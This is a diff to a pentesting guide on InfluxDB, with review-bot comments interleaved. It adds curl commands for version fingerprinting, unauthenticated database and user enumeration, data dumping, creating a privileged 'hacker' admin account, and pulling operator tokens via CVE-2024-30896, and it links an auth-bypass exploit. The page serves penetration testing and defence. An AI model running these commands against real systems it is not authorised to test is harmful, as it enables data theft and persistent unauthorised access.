117 changes: 110 additions & 7 deletions src/network-services-pentesting/8086-pentesting-influxdb.md
Expand Up @@ -13,6 +13,21 @@ PORT STATE SERVICE VERSION
8086/tcp open http InfluxDB http admin 1.7.5
```

## Identify & Version (HTTP)

- v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`.
- v2.x+: `GET /health` returns JSON with the server version and status. Works without auth.

```bash
# v1 banner grab
curl -i http://<host>:8086/ping

# v2/compat health
curl -s http://<host>:8086/health | jq .
```

Tip: exposed instances often also serve Prometheus-style metrics at `/metrics`.

## Enumeration

From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info.
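Review bot: the two bullets present `/ping` and `/health` as a v1-versus-v2 test, but that is not reliable: 2.x also answers `/ping` with 204 and the same `X-Influxdb-Version` / `X-Influxdb-Build` headers, and 1.8+ serves `/health` too (the Notes added further down in this same file say so). The section should state that the version header from `/ping` is the primary check and that `/health` only confirms status and version in JSON, rather than implying one endpoint per major version. The `/metrics` tip should also say for which versions and configurations that endpoint is reachable without authentication, since as written it reads as always open; for an operator, an unauthenticated `/metrics` or `/ping` reachable from outside the monitoring network is itself the finding to remediate.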
Expand All @@ -22,8 +37,8 @@ From a pentester point of view this another database that could be storing sensi
InfluxDB might require authentication or not

```bash
# Try unauthenticated
influx -host 'host name' -port 'port #'
# Try unauthenticated CLI (v1 shell)
influx -host <host> -port 8086
> use _internal
```
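Review bot: the comment now says `(v1 shell)` but nothing tells the reader that the `influx` binary shipped with 2.x is a different client that takes `--host http://<host>:8086` and `--token` and has no interactive `use` command, so this block only works with the 1.x client; one line saying so would save a failed attempt. `-port 8086` is the 1.x client default and could be dropped, but keeping it explicit is harmless.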

Expand All @@ -35,9 +50,50 @@ influx –username influx –password influx_pass

There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)

### Manual Enumeration
### Manual Enumeration (v1 HTTP API / InfluxQL)

Even when no CLI is available, the HTTP API is usually exposed on port 8086.

```bash
# List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

# List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"

# List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"

The information of this example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).
# List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"

# List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"

# Dump data from a measurement
curl -sG "http://<host>:8086/query" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .

# Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
--data-urlencode "epoch=ns" \
--data-urlencode "db=telegraf" \
--data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'
```

> [!WARNING]
> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`

If authentication is disabled, you can even create users and escalate:

```bash
# Create an admin user (v1, auth disabled)
curl -sG "http://<host>:8086/query" \
--data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
```

The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).

#### Show databases
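Review bot: the `CREATE USER ... WITH ALL PRIVILEGES` example will not do what its comment says. InfluxDB 1.x accepts GET on `/query` only for `SELECT` and `SHOW`; `CREATE`, `DROP`, `GRANT`, `REVOKE`, `DELETE`, `ALTER` and `SELECT INTO` are rejected with a parse error unless sent with POST, so `curl -sG "http://<host>:8086/query"` on that line should be `curl -s -XPOST "http://<host>:8086/query"` with the same `--data-urlencode`. The text around it should also say that this is a persistent write to the target rather than a read, and that the new account shows up in `SHOW USERS`, which is the simplest check an operator can run to detect it. Minor: moving the attribution sentence below the curl block and rewording it to refer to the CLI example is correct, since the new curl block is not from that source.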

Expand Down Expand Up @@ -109,13 +165,60 @@ time cpu host usage_guest usage_guest_nice usage_idle
1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101
```

> [!WARNING]
> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`
### InfluxDB v2.x API (Token-based)

InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:

```bash
# Basic org, bucket, and auth discovery
TOKEN="<token>"; H="-H Authorization: Token $TOKEN"

# Health & version
curl -s http://<host>:8086/health | jq .

# List organizations
curl -s $H http://<host>:8086/api/v2/organizations | jq .

# List buckets
curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

# List authorizations (requires perms)
ORGID=<org_id>
curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

# Query data with Flux
curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
-X POST http://<host>:8086/api/v2/query \
--data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'
```

Notes
- For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests.
- In v2, the HTTP `Authorization` header must be in the form `Token <value>`.

### Automated Authentication
### Automated Enumeration

```bash
msf6 > use auxiliary/scanner/http/influxdb_enum
```

### Recent vulns and privesc of interest (last years)

- InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test:

```bash
# Using a low-priv/all-access token tied to the default org
curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
# Look for entries of type "operator" and extract the raw token (if present)
```

- Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.



## References

- InfluxData docs: InfluxDB v1/v2 HTTP API reference (endpoints like `/ping`, `/health`, `/query`, `/api/v2/authorizations`). <https://docs.influxdata.com/influxdb/v1/tools/api/>
- CVE-2024-30896 operator token exposure in InfluxDB OSS 2.x. <https://www.wiz.io/vulnerability-database/cve/cve-2024-30896>
{{#include ../banners/hacktricks-training.md}}
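Review bot: `H="-H Authorization: Token $TOKEN"` followed by an unquoted `curl -s $H ...` never sends the token. Word splitting turns `$H` into the four words `-H`, `Authorization:`, `Token` and the token value, so curl gets an empty `Authorization:` header and treats `Token` and the token value as additional URLs to fetch, and every authenticated request in this block (organizations, buckets, authorizations, the Flux query) fails with 401. Write the header inline as `-H "Authorization: Token $TOKEN"`, or use a bash array, `H=(-H "Authorization: Token $TOKEN")`, expanded as `"${H[@]}"`. Smaller points: the CVE-2024-30896 bullet says "Upgrade to a fixed build when available" without naming one, so it should cite the fixed version from the advisory it links or say that none is listed; and the closing bullet about 1.x `/query` and `/write` exposed on the Internet would be more useful with the server-side controls 1.x already has (`auth-enabled = true` in the `[http]` section of `influxdb.conf`, a non-public `bind-address`, or an authenticating reverse proxy), since at the moment the section tells operators only what can be done to an open instance and not how to close it.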